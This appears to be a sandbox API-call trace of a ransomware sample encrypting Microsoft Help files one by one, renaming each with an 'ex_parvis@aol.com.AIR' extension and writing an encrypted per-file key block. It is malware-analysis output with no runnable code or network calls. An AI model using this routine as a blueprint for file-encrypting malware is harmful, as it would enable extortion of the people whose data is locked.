	[0100.683] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.683] GetProcessHeap () returned 0x540000
	[0100.683] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.683] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=350) returned 1
	[0100.683] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x15e
	[0100.683] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.683] GetProcessHeap () returned 0x540000
	[0100.683] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.683] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.683] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.684] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.684] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.684] ReadFile (in: hFile=0x4c0, lpBuffer=0x56b448, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesRead=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.684] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.684] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x15e, lpOverlapped=0x0) returned 1
	[0100.685] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.685] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.685] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.685] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 55
	[0100.685] GetProcessHeap () returned 0x540000
	[0100.685] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x5919d0
	[0100.685] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn"
	[0100.685] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.685] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.688] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.688] GetProcessHeap () returned 0x540000
	[0100.688] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.688] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=326) returned 1
	[0100.688] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x146
	[0100.688] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.688] GetProcessHeap () returned 0x540000
	[0100.688] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.688] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.689] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.690] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.690] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.690] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.690] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.690] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.690] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.690] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.690] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.690] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 55
	[0100.690] GetProcessHeap () returned 0x540000
	[0100.690] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x603bd0
	[0100.690] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn"
	[0100.690] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.690] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.693] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.693] GetProcessHeap () returned 0x540000
	[0100.693] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0100.693] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=326) returned 1
	[0100.693] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x146
	[0100.693] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.693] GetProcessHeap () returned 0x540000
	[0100.693] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.693] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.693] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.694] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.694] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.694] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.694] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.694] WriteFile (in: hFile=0x4c0, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x146, lpOverlapped=0x0) returned 1
	[0100.694] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.694] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.694] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.695] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 62
	[0100.695] GetProcessHeap () returned 0x540000
	[0100.695] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe2) returned 0x598b60
	[0100.695] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn"
	[0100.695] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.695] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.697] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.698] GetProcessHeap () returned 0x540000
	[0100.698] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.698] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=368) returned 1
	[0100.698] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x170
	[0100.698] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.698] GetProcessHeap () returned 0x540000
	[0100.698] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.698] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.698] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.699] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.699] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.699] ReadFile (in: hFile=0x4c0, lpBuffer=0x597dc8, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesRead=0x3a1f778*=0x170, lpOverlapped=0x0) returned 1
	[0100.699] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-368, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.699] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x170, lpOverlapped=0x0) returned 1
	[0100.699] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.699] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.699] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.700] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 58
	[0100.700] GetProcessHeap () returned 0x540000
	[0100.700] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x601bd0
	[0100.700] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn"
	[0100.700] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.700] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.703] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.703] GetProcessHeap () returned 0x540000
	[0100.703] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.703] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=344) returned 1
	[0100.703] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x158
	[0100.703] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.703] GetProcessHeap () returned 0x540000
	[0100.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.703] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.703] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.704] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.704] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.705] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x158, lpOverlapped=0x0) returned 1
	[0100.705] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.705] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x158, lpOverlapped=0x0) returned 1
	[0100.705] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.705] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.705] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.706] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 64
	[0100.706] GetProcessHeap () returned 0x540000
	[0100.706] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe6) returned 0x598b60
	[0100.706] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn"
	[0100.706] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.706] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.709] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.709] GetProcessHeap () returned 0x540000
	[0100.709] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.709] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=380) returned 1
	[0100.709] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x17c
	[0100.709] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.709] GetProcessHeap () returned 0x540000
	[0100.709] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.709] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.709] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
